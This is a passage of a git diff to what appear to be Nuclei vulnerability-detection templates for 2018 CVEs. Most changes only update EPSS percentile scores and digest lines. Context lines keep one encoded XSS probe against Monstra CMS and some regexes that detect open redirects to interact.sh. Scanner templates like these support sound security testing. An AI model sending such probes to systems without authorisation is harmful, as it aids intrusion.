cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index c8efc91a34..3d0db9f92c 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.4706 + epss-percentile: 0.47041 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008a36ca1ddcb0cd53566a2c1306b88fcec0db8c0a1000da71aea8cdc99017bd480221009196d7db5b194bd13ec2dd5157858739a1efd6543b599b22c4541dd2e5bfcce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008a36ca1ddcb0cd53566a2c1306b88fcec0db8c0a1000da71aea8cdc99017bd480221009196d7db5b194bd13ec2dd5157858739a1efd6543b599b22c4541dd2e5bfcce6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index f19893cddf..1c4cc32a61 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10201 cwe-id: CWE-22 epss-score: 0.04525 - epss-percentile: 0.91592 + epss-percentile: 0.9158 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index cd163de44e..363976c86f 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10230 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46351 + epss-percentile: 0.46323 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100be185d8fe22897a2f90b453e64868ceaf0cce0dfdb887ea278e273a16afc02cb0221009cc2534cef23c16d89d52c5bd3833ff194587d367e366b60f3d47e0e4bb51ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100be185d8fe22897a2f90b453e64868ceaf0cce0dfdb887ea278e273a16afc02cb0221009cc2534cef23c16d89d52c5bd3833ff194587d367e366b60f3d47e0e4bb51ac0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 2d9344522e..67ea91259b 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-10822 cwe-id: CWE-22 epss-score: 0.10309 - epss-percentile: 0.94381 + epss-percentile: 0.94376 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 1cc492574e..686a0d50db 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10823 cwe-id: CWE-78 epss-score: 0.96827 - epss-percentile: 0.99601 + epss-percentile: 0.99604 cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index bf94f4afca..3463f200e2 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10956 cwe-id: CWE-22 epss-score: 0.57917 - epss-percentile: 0.97395 + epss-percentile: 0.97398 cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 33526ef34c..655f4715e6 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-11227 cwe-id: CWE-79 epss-score: 0.02667 - epss-percentile: 0.89287 + epss-percentile: 0.89284 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 1bfd20a40a..14d6f46b3b 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11231 cwe-id: CWE-89 epss-score: 0.00903 - epss-percentile: 0.80926 + epss-percentile: 0.8091 cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c1783a904e8dd65c8e9e3c9e0c72340a0346f4319a8ea0b8ce9dafb3d6900e2c02200ece33bf84afb68af2229bf77b69036df24238b011a4dcada7d1e3c28ccb7123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c1783a904e8dd65c8e9e3c9e0c72340a0346f4319a8ea0b8ce9dafb3d6900e2c02200ece33bf84afb68af2229bf77b69036df24238b011a4dcada7d1e3c28ccb7123:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 25e183d45a..da2b726cbe 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11473 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40466 + epss-percentile: 0.40409 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true @@ -40,7 +40,6 @@ http: csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register - matchers-condition: and matchers: - type: word @@ -68,4 +67,5 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 490a00463044022044865b2df4ebae171af620872950c3ffcc1e0e09c0aa68ecda5610afb9839a660220239a8d665c10ce6792f5189b672a43d4bb7c12548a40fe838bfccf8bb01dd309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022044865b2df4ebae171af620872950c3ffcc1e0e09c0aa68ecda5610afb9839a660220239a8d665c10ce6792f5189b672a43d4bb7c12548a40fe838bfccf8bb01dd309:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index f911a9685f..2bbc4737c1 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.00151 - epss-percentile: 0.51207 + epss-percentile: 0.51189 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd93eb3ccb3cba4c01bc506ea46dc2d8bd1055222dae0628d3422cfca30bbd230220785c04ca8b6ff0059a1b4140a8ef4b87dc1b1e6ff4c0d94087ef487625f80a26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bd93eb3ccb3cba4c01bc506ea46dc2d8bd1055222dae0628d3422cfca30bbd230220785c04ca8b6ff0059a1b4140a8ef4b87dc1b1e6ff4c0d94087ef487625f80a26:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index b9a4f3d753..d3441ae254 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-11759 cwe-id: CWE-22 epss-score: 0.96598 - epss-percentile: 0.99516 + epss-percentile: 0.99517 cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 3e81208203..751184302a 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-11784 cwe-id: CWE-601 epss-score: 0.86178 - epss-percentile: 0.9826 + epss-percentile: 0.98262 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 79676b0839..356be51cbf 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.01411 - epss-percentile: 0.85013 + epss-percentile: 0.84989 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220453baba01da902c5358895dbdc9a05de122ef8b06d9722f82c84ab7d9d471477022100c252b7f0b1b65e6fc6580fcdfe8056c3523cc79ea12ce43a8772847186c892d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220453baba01da902c5358895dbdc9a05de122ef8b06d9722f82c84ab7d9d471477022100c252b7f0b1b65e6fc6580fcdfe8056c3523cc79ea12ce43a8772847186c892d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index fdfb01063d..89e50b6d8c 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-1207 cwe-id: CWE-94 epss-score: 0.01875 - epss-percentile: 0.87082 + epss-percentile: 0.87078 cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 411ac1453c..393ef20bab 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12095 cwe-id: CWE-79 epss-score: 0.00333 - epss-percentile: 0.68035 + epss-percentile: 0.68029 cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df82ea874f46d798e4dee154850bf58d5bcd211c689510c56f021e8d18d6ea2b022100ab94ef6dc22b4ea861ec5b94fa036d9afa95c77e3bdf9c3371da231762ccc87a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100df82ea874f46d798e4dee154850bf58d5bcd211c689510c56f021e8d18d6ea2b022100ab94ef6dc22b4ea861ec5b94fa036d9afa95c77e3bdf9c3371da231762ccc87a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1ce75d3223..eb8aa1af72 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01545 - epss-percentile: 0.85691 + epss-percentile: 0.85693 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4b0a00483046022100efa291899c178477505d371d846ae1864b6f636e21cc754af3e31172f11c54af02210087ada6444079b6e5f4647a8f7c602d55be9a26aabcf449e86c74efd7fa1e6bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100efa291899c178477505d371d846ae1864b6f636e21cc754af3e31172f11c54af02210087ada6444079b6e5f4647a8f7c602d55be9a26aabcf449e86c74efd7fa1e6bc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 6f10a4c120..2c4aa0300e 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-12300 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45725 + epss-percentile: 0.45709 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -34,4 +34,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022061a340d4bfd079d34bfc3a228cbd074d08e7668ce4f781f295076edc3ec584a9022100ab74f3275d55d3472aba82deac16d36592533fadcb3aa6f24338f5a6b08270af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022061a340d4bfd079d34bfc3a228cbd074d08e7668ce4f781f295076edc3ec584a9022100ab74f3275d55d3472aba82deac16d36592533fadcb3aa6f24338f5a6b08270af:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index fa6b180388..925dc8272c 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45725 + epss-percentile: 0.45709 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,5 @@ http: part: body words: - '' -# digest: 4b0a00483046022100cf6aba91d49858cda6b35315d783eddd484730236bfbf2fe86aee2793912a370022100d03a323a9228f736bf01de123b5b63bcad4982ac53a1a96cb1ef4ecfea691cc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cf6aba91d49858cda6b35315d783eddd484730236bfbf2fe86aee2793912a370022100d03a323a9228f736bf01de123b5b63bcad4982ac53a1a96cb1ef4ecfea691cc2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 490bf25d9d..92719b56c6 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.004 - epss-percentile: 0.70719 + epss-percentile: 0.70707 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e3be49e6aa9c227014330046f6a0a75a5b7734fc7674f4fd0c3181fa0ad4a37d0220225f2bec2f91703c0c27f42053c4f9afd09df77d9fd0d6b1ab89aba5c05e49ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e3be49e6aa9c227014330046f6a0a75a5b7734fc7674f4fd0c3181fa0ad4a37d0220225f2bec2f91703c0c27f42053c4f9afd09df77d9fd0d6b1ab89aba5c05e49ab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 4d96a9d0ab..a825ede770 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12909 cwe-id: CWE-22 epss-score: 0.01119 - epss-percentile: 0.82957 + epss-percentile: 0.82944 cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index d2d152bb9a..e25f841717 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12998 cwe-id: CWE-79 epss-score: 0.96915 - epss-percentile: 0.99643 + epss-percentile: 0.99646 cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index ac5128e40c..672fd93095 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -17,7 +17,7 @@ info: cvss-score: 8.1 cve-id: CVE-2018-1335 epss-score: 0.96734 - epss-percentile: 0.99571 + epss-percentile: 0.99574 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 6b81060a02..6a06eae4d4 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-13379 cwe-id: CWE-22 epss-score: 0.97336 - epss-percentile: 0.99865 + epss-percentile: 0.99864 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true @@ -37,4 +37,5 @@ http: part: body regex: - '^var fgt_lang =' -# digest: 4b0a00483046022100ed2c14ee26369970875d921e7a519466b02de8d5fae10a0ddb3dd547c4ae7a12022100814f09bb48900773da0952e3ad35747c54349066a2c714d7b19b01da676bace2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ed2c14ee26369970875d921e7a519466b02de8d5fae10a0ddb3dd547c4ae7a12022100814f09bb48900773da0952e3ad35747c54349066a2c714d7b19b01da676bace2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 238208beb6..4f87bc63be 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46351 + epss-percentile: 0.46323 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a02c82d53b06b349f935caae3138bee78a551ed269d87bb2310df3ef5754cfad02205fa44ba56805aa5f856dd198ab8e9a64f3aff1177f5848fea41c27d43c60dbd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a02c82d53b06b349f935caae3138bee78a551ed269d87bb2310df3ef5754cfad02205fa44ba56805aa5f856dd198ab8e9a64f3aff1177f5848fea41c27d43c60dbd8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 7a7a53afcc..2ec23a77f4 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.55132 + epss-percentile: 0.55115 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed946de6717440b03dd7fc577a89e81ca1bfdb5837cdb3d5be7ea94e03fba6f8022100cc73cf3d894ebc9c589f5999fc4065f93f70b7d376097b65c853cba028b7f852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ed946de6717440b03dd7fc577a89e81ca1bfdb5837cdb3d5be7ea94e03fba6f8022100cc73cf3d894ebc9c589f5999fc4065f93f70b7d376097b65c853cba028b7f852:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index d7422e2d7a..b1c1d36327 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14013 cwe-id: CWE-79 epss-score: 0.00512 - epss-percentile: 0.73977 + epss-percentile: 0.73971 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e1b30ffcdca74ca11fe6b216e94808103fdec21030fe269ad87093a59bedda6022020422f28544211e80d27d3441ac1936233c32339e0ad899ccad9a9d03ad1ec2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200e1b30ffcdca74ca11fe6b216e94808103fdec21030fe269ad87093a59bedda6022020422f28544211e80d27d3441ac1936233c32339e0ad899ccad9a9d03ad1ec2c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 69cc261923..4a4fcd83a1 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.15755 - epss-percentile: 0.9539 + epss-percentile: 0.95389 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index ae1d21a2e0..78931719d8 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14474 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.2851 + epss-percentile: 0.28476 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022048a4998eca31705819e466616b054632a148744185e367bcf1cfdec99302b6e5022100d3b5c93f77c773a339498def31967ea672f716a270fcb0239c8b890dee8c3e27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022048a4998eca31705819e466616b054632a148744185e367bcf1cfdec99302b6e5022100d3b5c93f77c773a339498def31967ea672f716a270fcb0239c8b890dee8c3e27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 20f1e777cc..6a8e360550 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-14574 cwe-id: CWE-601 epss-score: 0.01218 - epss-percentile: 0.83747 + epss-percentile: 0.83732 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 301 -# digest: 490a00463044022054390f620655fe17b6b551bbcd16cc668e6f8d45dab5dd238882287b5047e16602206efc1090214ca0bde3675657d8e44ef73b326ad84af8245d8679af2833586ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022054390f620655fe17b6b551bbcd16cc668e6f8d45dab5dd238882287b5047e16602206efc1090214ca0bde3675657d8e44ef73b326ad84af8245d8679af2833586ec6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 92d272ea2a..68fca8db30 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14912 cwe-id: CWE-22 epss-score: 0.96633 - epss-percentile: 0.99529 + epss-percentile: 0.9953 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c674203eb532a14991cc6ab5517f67cac8cbf4fbccdf6d2f8c2614629e13ace8022100808a231fc68a12027e35fd1b4c727e79aee5868457fed1510a2e2c8d75bbe2bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c674203eb532a14991cc6ab5517f67cac8cbf4fbccdf6d2f8c2614629e13ace8022100808a231fc68a12027e35fd1b4c727e79aee5868457fed1510a2e2c8d75bbe2bc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 71af14c92a..ff9714a7aa 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14916 cwe-id: CWE-732 epss-score: 0.00483 - epss-percentile: 0.73245 + epss-percentile: 0.73235 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022100b2b7be39c66d42c43425fc1ab734f1872201dad3fd166e832f14765330bbdfc0021f5562735b3b2a6e2ed6364e67b9ff7d45888ae59f134782aabdc3a6ec3ecacd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022100b2b7be39c66d42c43425fc1ab734f1872201dad3fd166e832f14765330bbdfc0021f5562735b3b2a6e2ed6364e67b9ff7d45888ae59f134782aabdc3a6ec3ecacd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index cad239ba53..ee9ef8647d 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14918 cwe-id: CWE-22 epss-score: 0.44897 - epss-percentile: 0.9704 + epss-percentile: 0.97038 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 0e976d3cf4..c36d3ec827 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45725 + epss-percentile: 0.45709 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -34,4 +34,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022057e1b104c2abaacbbab617eb459c80f249ad956221f9fe0290b3c70a4528c3d5022100a032ceb1e234bcc04c96d07ff533bfc0378b8a01e6640ac54aa978d372d1ffbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022057e1b104c2abaacbbab617eb459c80f249ad956221f9fe0290b3c70a4528c3d5022100a032ceb1e234bcc04c96d07ff533bfc0378b8a01e6640ac54aa978d372d1ffbb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 191dcf90e0..c7e86142d9 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-15138 cwe-id: CWE-22 epss-score: 0.28185 - epss-percentile: 0.96362 + epss-percentile: 0.96358 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index c6ba9e8cf5..2036de26b1 100644 --- 